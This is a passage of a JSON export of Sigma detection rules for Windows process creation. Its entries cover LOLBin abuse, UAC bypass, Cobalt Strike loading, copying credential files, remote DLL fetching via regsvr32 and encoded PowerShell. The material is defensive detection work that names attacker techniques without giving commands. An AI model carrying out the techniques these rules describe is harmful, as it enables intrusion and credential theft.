"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "value": "Execute Files with Msdeploy.exe" }, { "description": "Detects the execution of a potential recon command where the results are piped to \"findstr\". This is meant to trigger on inline calls of \"cmd.exe\" via the \"/c\" or \"/k\" for example.\nAttackers often time use this technique to extract specific information they require in their reconnaissance phase.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-07-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_recon_pipe_output.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml" ], "tags": [ "attack.discovery", "attack.t1057" ] }, "related": [ { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ccb5742c-c248-4982-8c5c-5571b9275ad3", "value": "Recon Command Output Piped To Findstr.EXE" }, { "description": "Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.", "meta": { "author": "FPT.EagleEye Team, wagga", "creation_date": "2020-12-11", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_mssql_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml" ], "tags": [ "attack.t1505.003", "attack.t1190", "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "value": "Suspicious Child Process Of SQL Server" }, { "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mofcomp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", "value": "Potential Suspicious Mofcomp Execution" }, { "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_ieinstal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", "value": "UAC Bypass Using IEInstal - Process" }, { "description": "Detects uncommon child processes of Appvlp.EXE\nAppvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", "meta": { "author": "Sreeman", "creation_date": "2020-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_appvlp_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml" ], "tags": [ "attack.t1218", "attack.defense-evasion", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "value": "Uncommon Child Process Of Appvlp.EXE" }, { "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "creation_date": "2018-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1047", "attack.t1204.002", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "438025f9-5856-4663-83f7-52f878a70a50", "value": "Suspicious Microsoft Office Child Process" }, { "description": "Detects execution of the \"cloudflared\" tool with the tunnel \"cleanup\" flag in order to cleanup tunnel connections.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Legitimate usage of Cloudflared." ], "filename": "proc_creation_win_cloudflared_tunnel_cleanup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1090", "attack.t1572" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7050bba1-1aed-454e-8f73-3f46f09ce56a", "value": "Cloudflared Tunnel Connections Cleanup" }, { "description": "Detects usage of \"IMEWDBLD.exe\" to download arbitrary files", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_imewbdld_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imewbdld_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "863218bd-c7d0-4c52-80cd-0a96c09f54af", "value": "Arbitrary File Download Via IMEWDBLD.EXE" }, { "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "creation_date": "2020-10-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_encoding_patterns.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "value": "Potential Encoded PowerShell Patterns In CommandLine" }, { "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", "meta": { "author": "frack113", "creation_date": "2022-11-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msbuild_susp_parent_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", "https://www.echotrail.io/insights/search/msbuild.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "value": "Suspicious Msbuild Execution By Uncommon Parent Process" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_2.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c98f2a0d-e1b8-4f76-90d3-359caf88d6b9", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2" }, { "description": "Detects execution of Microsoft bash launcher with the \"-c\" flag.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\n", "meta": { "author": "frack113", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bash_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Bash/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_command_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", "value": "Indirect Inline Command Execution Via Bash.EXE" }, { "description": "Detect execution of suspicious double extension files in ParentCommandLine", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_double_extension_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.007" ] }, "related": [ { "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "value": "Suspicious Parent Double Extension File Execution" }, { "description": "Detects execution of netsh with the \"advfirewall\" and the \"set\" option in order to set new values for properties of a existing rule", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Legitimate administration activity", "Software installations and removal" ], "filename": "proc_creation_win_netsh_fw_set_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/netsh.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a70dcb37-3bee-453a-99df-d0c683151be6", "value": "Firewall Rule Update Via Netsh.EXE" }, { "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", "meta": { "author": "Wojciech Lesicki", "creation_date": "2021-06-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/threat-detection-report/", "https://www.cobaltstrike.com/help-windows-executable", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "value": "CobaltStrike Load by Rundll32" }, { "description": "Files with well-known filenames (sensitive files with credential data) copying", "meta": { "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator." ], "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml", "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.003", "car.2013-07-001", "attack.s0404" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "value": "Copying Sensitive Files with Credential Data" }, { "description": "Detects the execution of WMIC to query information on a remote system", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_remote_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "value": "WMIC Remote Command Execution" }, { "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", "meta": { "author": "Micah Babinski, @micahbabinski", "creation_date": "2023-02-15", "falsepositive": [ "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "filename": "proc_creation_win_susp_right_to_left_override.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method", "https://unicode-explorer.com/c/202E", "https://redcanary.com/blog/right-to-left-override/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.002" ] }, "related": [ { "dest-uuid": "77eae145-55db-4519-8ae5-77b0c7215d69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "value": "Potential Defense Evasion Via Right-to-Left Override" }, { "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-04-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/rikvduijn/status/853251879320662017", "https://twitter.com/felixw3000/status/853354851128025088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "value": "Suspicious Control Panel DLL Load" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_gotoopener.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "value": "Remote Access Tool - GoToAssist Execution" }, { "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", "meta": { "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_product_class.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md", "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml" ], "tags": [ "attack.execution", "attack.t1047", "car.2016-03-002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e568650b-5dcd-4658-8f34-ded0b1e13992", "value": "Potential Product Class Reconnaissance Via Wmic.EXE" }, { "description": "Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.", "meta": { "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_schtasks_reg_loader_encoded.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "value": "Scheduled Task Executing Encoded Payload from Registry" }, { "description": "Detects various execution patterns of the CrackMapExec pentesting framework", "meta": { "author": "Thomas Patzke", "creation_date": "2020-05-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1053", "attack.t1059.003", "attack.t1059.001", "attack.s0106" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", "value": "HackTool - CrackMapExec Execution Patterns" }, { "description": "Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "FQDNs that start with a number such as \"7-Zip\"" ], "filename": "proc_creation_win_regsvr32_http_ip_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/tccontre18/status/1480950986650832903", "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/mrd0x/status/1461041276514623491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "value": "Potentially Suspicious Regsvr32 HTTP IP Pattern" }, { "description": "Detects usage of SoftPerfect's \"netscan.exe\". An application for scanning networks.\nIt is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.\n", "meta": { "author": "@d4ns4n_ (Wuerth-Phoenix)", "creation_date": "2024-04-25", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_win_pua_netscan.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/", "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf", "https://www.softperfect.com/products/networkscanner/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netscan.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca387a8e-1c84-4da3-9993-028b45342d30", "value": "PUA - SoftPerfect Netscan Execution" }, { "description": "Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-08", "falsepositive": [ "System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly" ], "filename": "proc_creation_win_pua_system_informer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_system_informer.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.discovery", "attack.defense-evasion", "attack.t1082", "attack.t1564", "attack.t1543" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5722dff1-4bdd-4949-86ab-fbaf707e767a", "value": "PUA - System Informer Execution" }, { "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-11", "falsepositive": [ "Unknown" ], "filename": 